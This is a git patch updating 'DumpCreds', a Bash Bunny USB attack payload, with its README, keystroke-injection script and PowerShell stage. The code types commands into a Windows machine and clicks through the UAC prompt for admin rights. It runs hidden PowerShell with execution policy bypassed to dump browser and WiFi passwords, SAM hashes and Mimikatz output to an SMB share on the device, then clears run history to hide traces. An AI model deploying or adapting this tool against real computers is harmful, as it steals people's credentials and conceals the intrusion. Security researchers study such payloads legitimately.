From 2d651c75f025bc1769e8a0298cb547f9a99e6ced Mon Sep 17 00:00:00 2001 From: Baur Date: Sun, 16 Apr 2017 08:03:02 +0200 Subject: [PATCH] Updated DumpCreds for bunny fw v1.1 (#168) * DumpCreds Version 2.1 - new payload.txt special for BashBunny FW 1.1 - minor changes in main.ps1 - insert some code for debugging * Updadet becaus new fork sync * new payload.txt special for BashBunny FW 1.1 + minor changes in main.ps1 + insert some code for debugging --- .../library/credentials/DumpCreds/README.md | 101 +++++++---- .../library/credentials/DumpCreds/main.ps1 | 33 ++-- .../library/credentials/DumpCreds/payload.txt | 170 ++++++++++-------- 3 files changed, 176 insertions(+), 128 deletions(-) diff --git a/payloads/library/credentials/DumpCreds/README.md b/payloads/library/credentials/DumpCreds/README.md index e0d45327..4c374fa3 100644 --- a/payloads/library/credentials/DumpCreds/README.md +++ b/payloads/library/credentials/DumpCreds/README.md @@ -1,22 +1,34 @@ -# DumpCreds 2.0 +# DumpCreds 2.1 * Author: QDBA -* Version: Version 2.0.2 Build 1003 -* Target: Windows +* Version: Version 2.1.0 Build 1004 +* Target: Windows 10 ## Description +** !!!!! works only at Bash Bunny with FW 1.1 !!!!! ** + Dumps the usernames & plaintext passwords from - - Browsers (Crome, IE, FireFox) - - Wifi - - SAM Hashes (only if AdminMode=True) - - Mimimk@tz Dump (only if AdminMode=True) - - Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) + * Browsers (Crome, IE, FireFox) + * Wifi + * SAM Hashes (only if AdminMode=True) + * Mimimk@tz Dump (only if AdminMode=True) + * Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) without - - Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) - - Internet connection (becaus Firewall ContentFilter Blocks the download sites) + * Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) + * Internet connection (becaus Firewall ContentFilter Blocks the download sites) + + +# Problems +- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded. +- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times) +- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. + If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue) + +# Debug +If you want some debug information, create a file with name "DEBUG" in the payload folder +you got the debug information in \loot\DumpCred_2.1\log.txt Folder - ## Configuration @@ -24,11 +36,6 @@ None needed. ## Requirements -Impacket must be installed. -Install it from tools_installer payload - -https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer - ## Download @@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred ## Install -Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory. +1. Put Bash Bunny in arming mode + +2. Coppy All Folders into the root of Bunny Flash Drive + Mandatory + * payloads/library/DumpCreds_2.1 --> the payload Files + * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload + * tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed) + Not neccessary + * docs --> this doc file + * languages --> languauge files for DUCKY_LANG + +3. eject Bash Bunny safely!! + +4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed ) + +5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2 + +6. eject Bash Bunny safely + +7. move switch in right position + +8. plugin Bash Bunny and have fun....! :-) + ## STATUS -| LED | Status | -| ------------------ | -------------------------------------------- | -| White | Give drivers some time for installation | -| Red Blink Fast | Impacket not found | -| Red Blink Slow | Target did not acquire IP address | -| Amber Blink Fast | Initialization | -| Amber | HID Stage | -| Purple Blink Fast | Wait for IP coming up | -| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) | -| Purple / Amber | Powershell scripts running | -| RED | Error in Powershell Scripts | -| Green | Finished | -| ------------------ | -------------------------------------------- | +| LED | Status | +| ----------------------- | -------------------------------------------- | +| Magenta Solid | Setup | +| Red slow blink | Impacket not found | +| Red fast blink | Target did not acquire IP address | +| Yellow single blink | Initialization | +| Yellow double blink | HID Stage | +| Yellow triple blink | Wait for IP coming up | +| Yellow quad blink | Wait for Handshake (SMBServer Coming up) | +| Yellow very fast blink | Powershell scripts running | +| White fast blink | Cleanup, copy Files to /loot | +| Green | Finished | +| ----------------------- | -------------------------------------------- | ## Discussion @@ -67,13 +96,7 @@ to......  https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1 +## Changelog -## ToDo - -- paralellize Creds gathering with PS -- check -- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target. - (Not very useful at ths time because I'm still Admin on Computer) -- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future) -- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check - (There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt) -- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain \ No newline at end of file +- Complete new payload.txt code for BashBunny 1.1 +- Added a lot of debug cod into the payload diff --git a/payloads/library/credentials/DumpCreds/main.ps1 b/payloads/library/credentials/DumpCreds/main.ps1 index b68f2ecb..9428213b 100644 --- a/payloads/library/credentials/DumpCreds/main.ps1 +++ b/payloads/library/credentials/DumpCreds/main.ps1 @@ -1,7 +1,7 @@  <# .SYNOPSIS - DumpCred 2.0 + DumpCred 2.1 .DESCRIPTION Dumps all Creds from a PC .PARAMETER @@ -10,8 +10,8 @@ DumpCred #> -$_Version = "2.0.2" -$_BUILD = "1003" +$_Version = "2.1.0" +$_BUILD = "1004" # Share on bashbunny $SHARE="\\172.16.64.1\e" @@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE Stop-Job * Remove-Job * -# Start all Jobs as background jobs -Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null -Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null -Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null -Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null -Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null +Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null if ($isAdmin) { - Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null - Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null + Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null + Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null } - +Write-host "... Wait for end of jobs" # Wait for all jobs -Get-Job | Wait-Job | Out-Null +Get-Job | Wait-Job +Write-host "... Receiving results" # Receive all results Get-Job | Receive-Job | Out-File -Append $TMPFILE + #Move TMP File to Bunny +Write-host "Moving file to bunny" move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue # Cleanup # Remove Run History Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue +Write-host "... Rename CON_OK to CON_EOF" # Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF" -# Kill cmd.exe +Write-host "... Kill cmds" +# Kill cmde.exe Stop-Process -name cmd -ErrorAction SilentlyContinue +Write-host "... Remove all Jobs" # Remove all Jobs from Joblist Remove-Job * \ No newline at end of file diff --git a/payloads/library/credentials/DumpCreds/payload.txt b/payloads/library/credentials/DumpCreds/payload.txt index c9d3afbc..7126135f 100644 --- a/payloads/library/credentials/DumpCreds/payload.txt +++ b/payloads/library/credentials/DumpCreds/payload.txt @@ -1,80 +1,85 @@ #!/bin/bash # -# Title: DumpCreds 2.0 +# Title: DumpCreds 2.1 # Author: QDBA -# Version: 2.0.2 -# Build: 1001 +# Version: 2.1.0 +# Build: 1004 # Category: Exfiltration -# Target: Windows Windows 7 + 10 (Powershell) -# Attackmodes: HID, Ethernet +# Target: Windows Windows 10 (Powershell) +# Attackmodes: HID, Ethernet +# !!! works only with Bash Bunny FW 1.1 and up !!! # # -# White................Wait for driver installation -# Red Blink Fast.......Impacket not found -# Red Blink Slow.......Target did not acquire IP address -# Amber Blink Fast.....Initialization -# Amber................HID Stage -# Purple Blink Fast....Wait for IP coming up -# Purple Blink Slow....Wait for Handshake (SMB Server Coming up) -# Purple / Amber ......Powershell scripts running -# RED..................Error in Powershell scripts -# Green................Finished -# -# OPTIONS +# LED Status +# ----------------------- + -------------------------------------------- +# SETUP + Setup +# FAIL + No /tools/impacket/examples/smbserver.py found +# FAIL2 + Target did not acquire IP address +# Yellow single blink + Initialization +# Yellow double blink + HID Stage +# Yellow triple blink + Wait for IP coming up +# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) +# Cyan inv quint blink + Powershell scripts running +# White fast blink + Cleanup, copy Files to /loot +# Green + Finished +# ----------------------- + -------------------------------------------- + +logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################" + + +###### Lets Start #### +LED SETUP -# Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh # Some Variables SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot -mkdir -p $LOOTDIR >/dev/null - -# Initialization -LED R G 100 - - -# Check for impacket. If not found, blink fast red. -if [ ! -f pentest/impacket/examples/smbserver.py ]; then - LED R 100 - exit 1 +# if the file DEBUG in payload folder exist, enter debug mode +if [ -f $SWITCHDIR/DEBUG ];then + DEBUG=1 # 1= Debug on / 0= Debug off + tail -f /var/log/syslog > /tmp/log.txt & +else + DEBUG=0 fi +mkdir -p $LOOTDIR + +REQUIRETOOL impacket + # remove old Handshake Files rm -f $SWITCHDIR/CON_* - # HID STAGE # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. -LED R G B +logger -t DumpCred_2.1 "### Enter HID Stage ###" +LED STAGE1 ATTACKMODE HID -Q SET_LANGUAGE DE +export DUCKY_LANG=de -# Give some time for driver installation -Q DELAY 25000 +Q DELAY 5000 -LED R G 100 # Launch initial cmd -Q GUI r +if [ $DEBUG -eq 1 ]; then + RUN WIN cmd +else + RUN WIN cmd /k mode con lines=1 cols=100 +fi + +# Launch powershell as admin (red window) Q DELAY 1000 -Q STRING cmd /k mode con lines=1 cols=180 +if [ $DEBUG -eq 1 ]; then + Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs" +else + Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs" +fi Q DELAY 500 Q ENTER -# Launch powershell as admin and deletes Run history -#Q GUI r -Q DELAY 1000 -#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs" -Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs" -Q DELAY 500 -Q ENTER - -# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o -# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o - +# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel) + # With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline # now the second powershell command goes to the admin cmd windows. @@ -90,59 +95,74 @@ Q ALT n Q DELAY 500 Q ENTER -LED R G +LED STAGE2 # Wait for Bunny Ethernet and Start main.ps1 Powershell Script Q DELAY 500 -Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" +if [ $DEBUG -eq 1 ]; then + Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\"" +else + Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" +fi Q DELAY 1000 Q ENTER - +logger -t DumpCred_2.1 "### Enter Ethernet Stage ###" # Ethernet Tage -LED R B 1 +LED STAGE3 ATTACKMODE RNDIS_ETHERNET # Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh - +logger -t DumpCred_2.1 "### Start SMBServer ###" # Start SMB Server -/pentest/impacket/examples/smbserver.py e $SWITCHDIR & +/tools/impacket/examples/smbserver.py e $SWITCHDIR & # Give target a chance to start exfiltration sleep 2 -# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk - - - +GET TARGET_IP # Check target IP address. If unset, blink slow red. if [ -z "${TARGET_IP}" ]; then - LED R 1000 - exit 1 + LED FAIL2 + logger -t DumpCred_2.1 "### No Target_IP ###" + logger -t DumpCred_2.1 "### Failed ###" + exit fi +logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###" -LED R B 1000 +LED STAGE4 # Handshake Bunny and Computer while ! [ -f $SWITCHDIR/CON_REQ ]; do + logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###" sleep 1 done mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK -LED R B +LED Y VERYFAST # Wait until CON_EOF - Computer set it if all is ready while ! [ -f $SWITCHDIR/CON_EOF ]; do - LED R B - sleep 1 - LED R G - sleep 1 - if [ -f $SWITCHDIR/CON_ERR ]; then - rm $SWITCHDIR/CON_ERR - LED R - exit 2 - fi + logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###" + sleep 2 done -rm $SWITCHDIR/CON_EOF -sync; sleep 1; sync -LED G +LED CLEANUP +# Cleanup +logger -t DumpCred_2.1 "### cleanup and copy files ###" +if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then + mkdir -p /root/udisk/loot/DumpCred_2.1 +fi +mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 +rmdir $LOOTDIR +rm -f $SWITCHDIR/CON_EOF + +logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################" + +# realy the end.... +if [ $DEBUG -eq 1 ]; then + killall tail + cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/ +fi + +ATTACKMODE RNDIS_ETHERNET STORAGE +sync; sleep 1; sync +LED FINISH \ No newline at end of file